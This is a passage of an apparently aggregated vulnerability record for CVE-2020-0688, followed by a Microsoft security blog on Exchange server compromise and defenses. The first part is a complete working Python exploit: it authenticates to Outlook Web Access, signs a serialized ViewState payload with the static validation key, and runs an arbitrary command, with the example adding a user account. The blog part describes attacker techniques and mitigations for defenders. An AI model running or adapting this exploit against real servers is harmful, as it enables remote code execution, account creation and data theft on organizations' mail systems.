Linux (as MacOS, probably ;-)\r\n Reverse Engineered Serialization code from https://github.com/pwntester/ysoserial.net\r\n\r\n Example Output:\r\n CVE-2020-0688-Photubias.py -t https://10.11.12.13 -u sean -c \"net user pwned pwned /add\"\r\n [+] Login worked\r\n [+] Got ASP.NET Session ID: 83af2893-6e1c-4cee-88f8-b706ebc77570\r\n [+] Detected OWA version number 15.2.221.12\r\n [+] Vulnerable View State \"B97B4E27\" detected, this host is vulnerable!\r\n [+] All looks OK, ready to send exploit (net user pwned pwned /add)? [Y/n]:\r\n [+] Got Payload: /wEy0QYAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADzBDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI+DQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc+L2MgIm5ldCB1c2VyIHB3bmVkIHB3bmVkIC9hZGQiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5PgvjXlpQBwdP741icUH6Wivr7TlI6g==\r\n Sending now ...\r\n'''\r\nimport urllib2, urllib, base64, binascii, hashlib, hmac, struct, argparse, sys, cookielib, ssl, getpass\r\n\r\n## STATIC STRINGS\r\n# This string acts as a template for the serialization (contains \"###payload###\" to be replaced and TWO size locations)\r\nstrSerTemplate = base64.b64decode('/wEy2gYAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAAD8BDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI+DQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc+L2MgIiMjI3BheWxvYWQjIyMiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5Pgs=')\r\n# This is a key installed in the Exchange Server, it is changeable, but often not (part of the vulnerability)\r\nstrSerKey = binascii.unhexlify('CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF')\r\n\r\ndef convertInt(iInput, length): \r\n return struct.pack(\"<I\" , int(iInput)).encode('hex')[:length]\r\n\r\ndef getYsoserialPayload(sCommand, sSessionId):\r\n ## PART1 of the payload to hash\r\n strPart1 = strSerTemplate.replace('###payload###', sCommand)\r\n ## Fix the length fields\r\n #print(binascii.hexlify(strPart1[3]+strPart1[4])) ## 'da06' > '06da' (0x06b8 + len(sCommand))\r\n #print(binascii.hexlify(strPart1[224]+strPart1[225])) ## 'fc04' > '04fc' (0x04da + len(sCommand))\r\n strLength1 = convertInt(0x06b8 + len(sCommand),4)\r\n strLength2 = convertInt(0x04da + len(sCommand),4)\r\n strPart1 = strPart1[:3] + binascii.unhexlify(strLength1) + strPart1[5:]\r\n strPart1 = strPart1[:224] + binascii.unhexlify(strLength2) + strPart1[226:]\r\n \r\n ## PART2 of the payload to hash\r\n strPart2 = '274e7bb9'\r\n for v in sSessionId: strPart2 += binascii.hexlify(v)+'00'\r\n strPart2 = binascii.unhexlify(strPart2)\r\n \r\n strMac = hmac.new(strSerKey, strPart1 + strPart2, hashlib.sha1).hexdigest()\r\n strResult = base64.b64encode(strPart1 + binascii.unhexlify(strMac))\r\n return strResult\r\n\r\ndef verifyLogin(sTarget, sUsername, sPassword, oOpener, oCookjar):\r\n if not sTarget[-1:] == '/': sTarget += '/'\r\n ## Verify Login\r\n lPostData = {'destination' : sTarget, 'flags' : '4', 'forcedownlevel' : '0', 'username' : sUsername, 'password' : sPassword, 'passwordText' : '', 'isUtf8' : '1'}\r\n try: sResult = oOpener.open(urllib2.Request(sTarget + 'owa/auth.owa', data=urllib.urlencode(lPostData), headers={'User-Agent':'Python'})).read()\r\n except: print('[!] Error, ' + sTarget + ' not reachable')\r\n bLoggedIn = False\r\n for cookie in oCookjar:\r\n if cookie.name == 'cadata': bLoggedIn = True\r\n if not bLoggedIn:\r\n print('[-] Login Wrong, too bad')\r\n exit(1)\r\n print('[+] Login worked')\r\n\r\n ## Verify Session ID\r\n sSessionId = ''\r\n sResult = oOpener.open(urllib2.Request(sTarget+'ecp/default.aspx', headers={'User-Agent':'Python'})).read()\r\n for cookie in oCookjar:\r\n if 'SessionId' in cookie.name: sSessionId = cookie.value\r\n print('[+] Got ASP.NET Session ID: ' + sSessionId)\r\n\r\n ## Verify OWA Version\r\n sVersion = ''\r\n try: sVersion = sResult.split('stylesheet')[0].split('href=\"')[1].split('/')[2]\r\n except: sVersion = 'favicon'\r\n if 'favicon' in sVersion:\r\n print('[*] Problem, this user has never logged in before (wizard detected)')\r\n print(' Please log in manually first at ' + sTarget + 'ecp/default.aspx')\r\n exit(1)\r\n print('[+] Detected OWA version number '+sVersion)\r\n\r\n ## Verify ViewStateValue\r\n sViewState = ''\r\n try: sViewState = sResult.split('__VIEWSTATEGENERATOR')[2].split('value=\"')[1].split('\"')[0]\r\n except: pass\r\n if sViewState == 'B97B4E27':\r\n print('[+] Vulnerable View State \"B97B4E27\" detected, this host is vulnerable!')\r\n else:\r\n print('[-] Error, viewstate wrong or not correctly parsed: '+sViewState)\r\n ans = raw_input('[?] Still want to try the exploit? [y/N]: ')\r\n if ans == '' or ans.lower() == 'n': exit(1)\r\n return sSessionId, sTarget, sViewState\r\n \r\ndef main():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('-t', '--target', help='Target IP or hostname (e.g. https://owa.contoso.com)', default='')\r\n parser.add_argument('-u', '--username', help='Username (e.g. joe or [email\u00a0protected])', default='')\r\n parser.add_argument('-p', '--password', help='Password (leave empty to ask for it)', default='')\r\n parser.add_argument('-c', '--command', help='Command to put behind \"cmd /c \" (e.g. net user pwned pwned /add)', default='')\r\n args = parser.parse_args()\r\n if args.target == '' or args.username == '' or args.command == '':\r\n print('[!] Example usage: ')\r\n print(' ' + sys.argv[0] + ' -t https://owa.contoso.com -u joe -c \"net user pwned pwned /add\"')\r\n else:\r\n if args.password == '': sPassword = getpass.getpass('[*] Please enter the password: ')\r\n else: sPassword = args.password\r\n ctx = ssl.create_default_context()\r\n ctx.check_hostname = False\r\n ctx.verify_mode = ssl.CERT_NONE\r\n oCookjar = cookielib.CookieJar()\r\n #oProxy = urllib2.ProxyHandler({'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'})\r\n #oOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar),oProxy)\r\n oOpener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx),urllib2.HTTPCookieProcessor(oCookjar))\r\n sSessionId, sTarget, sViewState = verifyLogin(args.target, args.username, sPassword, oOpener, oCookjar)\r\n ans = raw_input('[+] All looks OK, ready to send exploit (' + args.command + ')? [Y/n]: ')\r\n if ans.lower() == 'n': exit(0)\r\n sPayLoad = getYsoserialPayload(args.command, sSessionId)\r\n print('[+] Got Payload: ' + sPayLoad)\r\n sURL = sTarget + 'ecp/default.aspx?__VIEWSTATEGENERATOR=' + sViewState + '&__VIEWSTATE=' + urllib.quote_plus(sPayLoad)\r\n print(' Sending now ...')\r\n try: oOpener.open(urllib2.Request(sURL, headers={'User-Agent':'Python'}))\r\n except urllib2.HTTPError, e:\r\n if e.code == '500': print('[+] This probably worked (Error Code 500 received)')\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()\n\n# 0day.today [2020-03-04] #", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/34037"}], "mssecure": [{"lastseen": "2020-06-26T22:16:11", "bulletinFamily": "blog", "cvelist": ["CVE-2020-0688"], "description": "Securing Exchange servers is one of the most important things defenders can do to limit organizational exposure to attacks. Any threat or vulnerability impacting Exchange servers should be treated with the highest priority because these servers contain critical business data, as well as highly privileged accounts that attackers attempt to compromise to gain admin rights to the server and, consequently, complete control of the network.\n\nIf compromised, Exchange servers provide a unique environment that could allow attackers to perform various tasks using the same built-in tools or scripts that admins use for maintenance. This is exacerbated by the fact that Exchange servers have traditionally lacked antivirus solutions, network protection, the latest security updates, and proper security configuration, often intentionally, due to the misguided notion that these protections interfere with normal Exchange functions. Attackers know this, and they leverage this knowledge to gain a stable foothold on a target organization.\n\nThere are two primary ways in which Exchange servers are compromised. The first and more common scenario is attackers launching social engineering or drive-by download attacks targeting endpoints, where they steal credentials and move laterally to other endpoints in a progressive dump-escalate-move method until they gain access to an Exchange server.\n\nThe second scenario is where attackers exploit a remote code execution vulnerability affecting the underlying Internet Information Service (IIS) component of a target Exchange server. This is an attacker\u2019s dream: directly landing on a server and, if the server has misconfigured access levels, gain system privileges.\n\nThe first scenario is more common, but we\u2019re seeing a rise in attacks of the second variety; specifically, attacks that exploit Exchange vulnerabilities like [CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>). The [security update](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) that fixes this vulnerability has been available for several months, but, notably, to this day, attackers find vulnerable servers to target.\n\nIn many cases, after attackers gain access to an Exchange server, what follows is the deployment of web shell into one of the many web accessible paths on the server. As we discussed in a previous blog, [web shells](<https://www.microsoft.com/security/blog/2020/02/04/ghost-in-the-shell-investigating-web-shell-attacks/>) allow attackers to steal data or perform malicious actions for further compromise.\n\n## Behavior-based detection and blocking of malicious activities on Exchange servers\n\nAdversaries like using web shells, which are relatively small pieces of malicious code written in common programming languages, because these can be easily modified to evade traditional file-based protections. A more durable approach to detecting web shell activity involves profiling process activities originating from external-facing Exchange applications.\n\n[Behavior-based blocking and containment](<https://www.microsoft.com/security/blog/2020/03/09/behavioral-blocking-and-containment-transforming-optics-into-protection/>) capabilities in Microsoft Defender ATP, which use engines that specialize in [detecting threats by analyzing behavior](<https://www.microsoft.com/security/blog/2019/10/08/in-hot-pursuit-of-elusive-threats-ai-driven-behavior-based-blocking-stops-attacks-in-their-tracks/>), surface suspicious and malicious activities on Exchange servers. These detection engines are powered by cloud-based machine learning classifiers that are trained by expert-driven profiling of legitimate vs. suspicious activities in Exchange servers.\n\nIn April, multiple Exchange-specific behavior-based detections picked up unusual activity. The telemetry showed attackers operating on on-premises Exchange servers using deployed web shells. Whenever attackers interacted with the web shell, the hijacked application pool ran the command on behalf of the attacker, generating an interesting process chain. Common services, for example Outlook on the web (formerly known as Outlook Web App or OWA) or Exchange admin center (EAC; formerly known as the Exchange Control Panel or ECP), executing _net.exe_, _cmd.exe_, and other known living-off-the-land binaries ([LOLBins](<https://github.com/LOLBAS-Project/LOLBAS/blob/master/README.md>)) like _mshta.exe_ is very suspicious and should be further investigated.\n\n\n\n_Figure 1. Behavior-based detections of attacker activity on Exchange servers_\n\nIn this blog, we\u2019ll share our investigation of the Exchange attacks in early April, covering multiple campaigns occurring at the same time. The data and techniques from this analysis make up an anatomy of Exchange server attacks. Notably, the attacks used multiple fileless techniques, adding another layer of complexity to detecting and resolving these threats, and demonstrating how behavior-based detections are key to protecting organizations.\n\n[](<https://www.microsoft.com/security/blog/wp-content/uploads/2020/06/Exchange-servers-attack-chain-2.png>)\n\n_Figure 2. Anatomy of an Exchange server attack_\n\n## Initial access: Web shell deployment\n\nAttackers started interacting with target Exchange servers through web shells they had deployed. Any path accessible over the internet is a potential target for web shell deployment, but in these attacks, the most common client access paths were:\n\n * _%ProgramFiles%\\Microsoft\\Exchange Server\\&lt;version&gt;\\ClientAccess_\n * _%ProgramFiles%\\Microsoft\\Exchange Server\\&lt;version&gt;\\FrontEnd_\n\nThe ClientAccess and FrontEnd directories provide various client access services such as Outlook on the web, EAC, and AutoDiscover, to name a few. These IIS virtual directories are automatically configured during server installation and provide authentication and proxy services for internal and external client connections.\n\nThese directories should be monitored for any new file creation. While file creation events alone cannot be treated as suspicious, correlating such events with the responsible process results in more reliable signals. Common services like OWA or ECP dropping _.aspx_ or _.ashx_ files in any of the said directories is highly suspicious.\n\nIn our investigation, most of these attacks used the [China Chopper](<https://attack.mitre.org/software/S0020/>) web shell. The attackers tried to blend the web shell script file with other _.aspx_ files present on the system by using common file names. In many cases, hijacked servers used the \u2018echo\u2019 command to write the web shell. In other cases, _certutil.exe_ or _powershell.exe_ were used. Here are some examples of the China Chopper codes that were dropped in these attacks:\n\n\n\nWe also observed the attackers switching web shells or introducing two or more for various purposes. In one case, the attackers created an _.ashx_ version of a popular, publicly available _.aspx_ web shell, which exposes minimum functionality:\n\n\n\n[](<https://www.microsoft.com/security/blog/wp-content/uploads/2020/06/A-suspicious-web-script-was-created.png>)\n\n_Figure 3. Microsoft Defender ATP alert for web shell_\n\n## Reconnaissance\n\nAfter web shell deployment, attackers typically ran an initial set of exploratory commands like _whoami_, _ping_, and _net user_. In most cases, the hijacked application pool services were running with system privileges, giving attackers the highest privilege.\n\nAttackers enumerated all local groups and members on the domain to identify targets. Interestingly, in some campaigns, attackers used open-source user group enumerating tools like _lg.exe_ instead of the built-in _net.exe_. Attackers also used the [EternalBlue](<https://www.microsoft.com/security/blog/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) exploit and _nbtstat_ scanner to identify vulnerable machines on the network.\n\n\n\nNext, the attackers ran built-in Exchange Management Shell cmdlets to gain more information about the exchange environment. Attackers used these cmdlets to perform the following:\n\n * List all Exchange admin center virtual directories in client access services on all Mailbox servers in the network\n * Get a summary list of all the Exchange servers in the network\n * Get information on mailboxes, such as size and number of items, along with role assignments and permissions.\n\n\n\n[](<https://www.microsoft.com/security/blog/wp-content/uploads/2020/06/Anomalous-account-lookups.png>)\n\n_Figure 4. Microsoft Defender ATP alert showing process tree for anomalous account lookups_\n\n## Persistence\n\nOn misconfigured servers where they have gained the highest privileges, attackers were able to add a new user account on the server. This gave the attackers the ability to access the server without the need to deploy any remote access tools.\n\nThe attackers then added the newly created account to high-privilege groups like Administrators, Remote Desktop Users, and Enterprise Admins, practically making the attackers a domain admin with unrestricted access to any users or group in the organization.\n\n\n\n[](<https://www.microsoft.com/security/blog/wp-content/uploads/2020/06/New-local-admin-added-using-Net-commands.png>)\n\n_Figure 5. Microsoft Defender ATP alert showing process tree for addition of local admin using Net commands_\n\n## Credential access\n\nExchange servers contain the most sensitive users and groups in an organization. Gaining credentials to these accounts could virtually give attackers domain admin privileges.\n\nIn our investigation, the attackers first dumped user hashes by saving the Security Account Manager (SAM) database from the registry.\n\n\n\nNext, the attackers used the ProcDump tool to dump the Local Security Authority Subsystem Service (LSASS) memory. The dumps were later archived and uploaded to a remote location.\n\n\n\nIn some campaigns, attackers dropped Mimikatz and tried to dump hashes from the server.\n\n\n\n[](<https://www.microsoft.com/security/blog/wp-content/uploads/2020/06/Malicious-credential-theft-tool-execution-detected.png>)\n\n_Figure 6. Microsoft Defender ATP alert on detection of Mimikatz_\n\nIn environments where Mimiktaz was blocked, attackers dropped a modified version with hardcoded implementation to avoid detection. Attackers also added a wrapper written in the Go programming language to make the binary more than 5 MB. The binary used the open-source MemoryModule library to load the binary using [reflective DLL injection](<https://www.microsoft.com/security/blog/2017/11/13/detecting-reflective-dll-loading-with-windows-defender-atp/>). Thus, the payload never touched the disk and was present only in memory, achieving a fileless persistence.\n\nThe attackers also enabled \u2018_wdigest_\u2019 registry settings, which forced the system to use WDigest protocol for authentication, resulting in _lsass.exe_ retaining a copy of the user\u2019s plaintext password in memory. This change allowed the attacker to steal the actual password, not just the hash.\n\n\n\n\n\nAnother example of stealthy execution that attackers implemented was creating a wrapper binary for ProcDump and Mimikatz. When run, the tool dropped and executed the ProcDump binary to dump the LSASS memory. The memory dump was loaded inside the same binary and parsed to extract passwords, another example of [reflective DLL injection](<https://www.microsoft.com/security/blog/2017/11/13/detecting-reflective-dll-loading-with-windows-defender-atp/>) where the Mimikatz binary was present only in memory.\n\n\n\nWith attacker-controlled accounts now part of Domain Admins group, the attackers performed a technique called [DCSYNC](<https://attack.mitre.org/techniques/T1003/>) attack, which abuses the Active Directory replication capability to request account information, such as the NTLM hashes of all the users\u2019 passwords in the organization. This technique is extremely stealthy because it can be performed without running a single command on the actual domain controller.\n\n\n\n## Lateral movement\n\nIn these attacks, the attackers used several known methods to move laterally:\n\n * The attackers heavily abused WMI for executing tools on remote systems.\n\n\n\n * The attackers also used other techniques such as creating service or schedule task on remote systems.\n\n\n\n\n\n * In some cases, the attackers simply run commands on remote systems using PsExec.\n\n\n\n## Exchange Management Shell abuse\n\nThe Exchange Management Shell is the PowerShell interface for administrators to manage the Exchange server. As such, it exposes many critical Exchange PowerShell cmdlets to allow admins to perform various maintenance tasks, such as assigning roles and permissions, and migration, including importing and exporting mailboxes. These cmdlets are available only on Exchange servers in the Exchange Management Shell or through remote PowerShell connections to the Exchange server.\n\nTo understand suspicious invocation of the Exchange Management Shell, we need to go one step back in the process chain and analyze the responsible process. As mentioned, common application pools_ MSExchangeOWAAppPool_ or _MSExchangeECPAppPool _accessing the shell should be considered suspicious.\n\nIn our investigation, attackers leveraged these admin cmdlets to perform critical tasks such as exporting mailboxes or running arbitrary scripts. Attackers used different ways to load and run PowerShell cmdlets through the Exchange Management Shell.\n\n\n\nIn certain cases, attackers created a PowerShell wrapper around the commands to effectively hide behind legitimate PowerShell activity.\n\n\n\nThese cmdlets allowed the attackers to perform the following:\n\n * Search received email\n\nIn our investigations, attackers were primarily interested in received emails. They searched for message delivery information filtered by the event \u2018Received\u2019. The search time frame showed the attackers were initially interested in the entire log history. Later, a similar command was run with a trimmed timeline of one year.\n\n\n\n * Export mailbox\n\nAttackers exported mailboxes through these four steps:\n\n 1. 1. Granted _ApplicationImpersnation_ role to the attacker-controlled account. This effectively allowed the supplied account to access all mailboxes in the organization.\n 2. Granted \u2018Mailbox Import Export\u2019 role to the attacker-controlled account. This role is required to be added before attempting mailbox export.\n 3. Exported the mailbox with filter \u201c_Received -gt \u201801/01/2020 0:00:00_\u2019\u201d.\n 4. Removed the mailbox export request to avoid raising suspicion.\n\n\n\n\n\n## Tampering with security tools\n\nAs part of lateral movement, the attackers attempted to disable Microsoft Defender Antivirus. Attackers also disabled archive scanning to bypass detection of tools and data compressed in .zip files, as well as created exclusion for _.dat_ extension. The attackers tried to disable automatic updates to avoid any detection by new intelligence updates. For Microsoft Defender ATP customers, [tamper protection](<https://docs.microsoft.com/windows/security/threat-protection/windows-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>) prevents such malicious and unauthorized changes to security settings.\n\n\n\n## Remote access\n\nThe next step for attackers was to create a network architecture using port forwarding tools like _plink.exe_, a command line connection tool like _ssh_. Using these tools allowed attackers to bypass network restrictions and remotely access machines through Remote Desktop Protocol (RDP). This is a very stealthy technique: attackers reused dumped credentials to access the machines through encrypted tunneling software, eliminating the need to deploy backdoors, which may have a high chance of getting detected.\n\n\n\n## Exfiltration\n\nFinally, dumped data was compressed using the utility tool _rar.exe. _The compressed data mostly comprised of the extracted _.pst_ files, along with memory dumps.\n\n\n\n# Improving defenses against Exchange server compromise\n\nAs these attacks show, Exchange servers are high-value targets. These attacks also tend to be advanced threats with highly evasive, fileless techniques. For example, at every stage in the attack chain above, the attackers abused existing tools (LOLBins) and scripts to accomplish various tasks. Even in cases where non-system binaries were introduced, they were either legitimate and signed, like _plink.exe_, or just a proxy for the malicious binary, for example, the modified Mimikatz where the actual malicious payload never touched the disk.\n\nKeeping these servers safe from these advanced attacks is of utmost importance. Here are steps that organizations can take to ensure they don\u2019t fall victim to Exchange server compromise.\n\n 1. Apply the latest security updates\n\nIdentify and remediate vulnerabilities or misconfigurations in Exchange servers. Deploy the latest security updates, especially for server components like Exchange, as soon as they become available. Specifically, check that the patches for CVE-2020-0688 is in place. Use [threat and vulnerability management](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt>) to audit these servers regularly for vulnerabilities, misconfigurations, and suspicious activity.\n\n 2. Keep antivirus and other protections enabled\n\nIt\u2019s critical to protect Exchange servers with [antivirus software](<https://docs.microsoft.com/exchange/antispam-and-antimalware/windows-antivirus-software?view=exchserver-2019>) and other security solutions like firewall protection and MFA. [Turn on cloud-delivered protection](<https://docs.microsoft.com/windows/security/threat-protection/windows-defender-antivirus/enable-cloud-protection-windows-defender-antivirus>) and automatic sample submission to use artificial intelligence and machine learning to quickly identify and stop new and unknown threats. Use [attack surface reduction rules](<https://docs.microsoft.com/windows/security/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard>) to automatically block behaviors like credential theft and suspicious use of PsExec and WMI. Turn on [tamper protection](<https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/Tamper-protection-now-generally-available-for-Microsoft-Defender/ba-p/911482>) features to prevent attackers from stopping security services.\n\nIf you are worried that these security controls will affect performance or disrupt operations, engage with IT pros to help determine the true impact of these settings. Security teams and IT pros should collaborate on applying mitigations and appropriate [settings](<https://docs.microsoft.com/exchange/antispam-and-antimalware/windows-antivirus-software>).\n\n 3. Review sensitive roles and groups\n\nReview highly privileged groups like Administrators, Remote Desktop Users, and Enterprise Admins. Attackers add accounts to these groups to gain foothold on a server. Regularly review these groups for suspicious additions or removal. To identify Exchange-specific anomalies, review the list of users in sensitive roles such as _mailbox import export_ and _Organization Management_ using the _Get-ManagementRoleAssignment_ cmdlet in Exchange PowerShell.\n\n 4. Restrict access\n\nPractice the principle of least-privilege and maintain credential hygiene. Avoid the use of domain-wide, admin-level service accounts. Enforce [strong randomized, just-in-time local administrator passwords](<https://docs.microsoft.com/windows-server/identity/securing-privileged-access/securing-privileged-access#2-just-in-time-local-admin-passwords>) and Enable MFA. Use tools like [LAPS](<https://technet.microsoft.com/en-us/mt227395.aspx>).\n\nPlace access control list (ACL) restrictions on ECP and other virtual directories in IIS. Don\u2019t expose the ECP directory to the web if it isn\u2019t necessary and to anyone in the company who doesn\u2019t need to access it. Apply similar restrictions to other application pools.\n\n 5. Prioritize alerts\n\nThe distinctive patterns of Exchange server compromise aid in detecting malicious behaviors and inform security operations teams to quickly respond to the initial stages of compromise. Pay attention to and immediately investigate alerts indicating suspicious activities on Exchange servers. Catching attacks in the exploratory phase, the period in which attackers spend several days exploring the environment after gaining access, is key. Common application pools like \u2018_MSExchangeOWAAppPool\u2019_ or _\u2018MSExchangeECPAppPool\u2019 _are commonly hijacked by attackers through web shell deployment. Prioritize alerts related to processes such as _net.exe_, _cmd.exe_, and _mshta.exe_ originating from these pools or _w3wp.exe_ in general.\n\nBehavior-based blocking and containment capabilities in [Microsoft Defender Advanced Threat Protection](<https://www.microsoft.com/WindowsForBusiness/windows-atp>) stop many of the malicious activities we described in this blog. Behavior-based blocking and containment stops advanced attacks in their tracks by detecting and halting malicious processes and behaviors.\n\n \n\n \n\n_Figure 7. Microsoft Defender ATP alerts on blocked behaviors_\n\nIn addition, Microsoft Defender ATP\u2019s endpoint detection and response (EDR) sensors provide visibility into malicious behaviors associated with Exchange server compromise. Behavior-based Exchange-specific alerts include \u201cSuspicious w3wp.exe activity in Exchange\u201d, which indicates that attackers are running arbitrary commands via the IIS processes in an Exchange server.\n\n[](<https://www.microsoft.com/security/blog/wp-content/uploads/2020/06/Suspiciousw3wpexeactivityinExchange.png>)\n\n_Figure 8. Microsoft Defender ATP alert and process tree for suspicious w3wp.exe activity in Exchange_\n\nThese alerts should be immediately prioritized and fully investigated, and any credentials present on the Exchange server, including those used for service accounts and scheduled tasks, should be considered compromised. Beyond resolving these alerts in the shortest possible time, organizations should focus on investigating the end-to-end attack chain and trace the vulnerability, misconfiguration, or other weakness in the infrastructure that allowed the attack to occur.\n\nMicrosoft Defender ATP is a component of the broader [Microsoft Threat Protection](<https://www.microsoft.com/security/technology/threat-protection>) (MTP), which provides comprehensive visibility into advanced attacks by combining the capabilities of Office 365 ATP, Azure ATP, Microsoft Cloud App Security, and Microsoft Defender ATP. Through the [incidents](<https://docs.microsoft.com/microsoft-365/security/mtp/incidents-overview?view=o365-worldwide>) view, MTP provides a consolidated picture of related attack evidence that shows the complete attack story, empowering SecOps teams to thoroughly investigate attacks.\n\nIn addition, MTP\u2019s visibility into malicious artifacts and behavior empowers security operations teams to proactively hunt for threats on Exchange servers. For example, MTP can be connected to Azure Sentinel to enable [web shell threat hunting](<https://techcommunity.microsoft.com/t5/azure-sentinel/web-shell-threat-hunting-with-azure-sentinel-and-microsoft/ba-p/1448065>).\n\nThrough built-in intelligence and automation, Microsoft Threat Protection coordinates protection, detection, and response across endpoints, identity, data, and apps. [Learn more](<https://www.microsoft.com/en-us/security/technology/threat-protection>).\n\n \n\n**_Hardik Suri_**\n\n_Microsoft Defender ATP Research Team_\n\n \n\n### MITRE ATT&amp;CK techniques\n\nInitial access\n\n * [Exploit Public-Facing Application](<https://attack.mitre.org/techniques/T1190/>)\n\nExecution\n\n * [Command-line interface](<https://attack.mitre.org/techniques/T1059/>)\n * [Windows Management Instrumentation](<https://attack.mitre.org/techniques/T1047/>)\n * [PowerShell](<https://attack.mitre.org/techniques/T1086/>)\n\nPersistence\n\n * [Web Shell](<https://attack.mitre.org/techniques/T1100/>)\n * [Create Account](<https://attack.mitre.org/techniques/T1136/>)\n * [New Service](<https://attack.mitre.org/techniques/T1050/>)\n * [Scheduled Task](<https://attack.mitre.org/techniques/T1053/>)\n\nPrivilege escalation\n\n * [Valid Accounts](<https://attack.mitre.org/techniques/T1078/>)\n * [Web Shell](<https://attack.mitre.org/techniques/T1100/>)\n\nDefense evasion\n\n * [Indicator Removal from Tools](<https://attack.mitre.org/techniques/T1066/>)\n * [Obfuscated Files or Information](<https://attack.mitre.org/techniques/T1027/>)\n * [Masquerading](<https://attack.mitre.org/techniques/T1036/>)\n\nCredential access\n\n * [Credential Dumping](<https://attack.mitre.org/techniques/T1003/>)\n\nDiscovery\n\n * [System Network Configuration Discovery](<https://attack.mitre.org/techniques/T1016/>)\n * [Remote System Discovery](<https://attack.mitre.org/techniques/T1018/>)\n * [Account Discovery](<https://attack.mitre.org/techniques/T1087/>)\n * [Permission Groups Discovery](<https://attack.mitre.org/techniques/T1069/>)\n\nLateral movement\n\n * [Windows Admin Shares](<https://attack.mitre.org/techniques/T1077/>)\n * [Pass the Hash](<https://attack.mitre.org/techniques/T1075/>)\n * [Remote File Copy](<https://attack.mitre.org/techniques/T1105/>)\n * [Windows Management Instrumentation](<https://attack.mitre.org/techniques/T1047/>)\n * [New Service](<https://attack.mitre.org/techniques/T1050/>)\n * [Scheduled 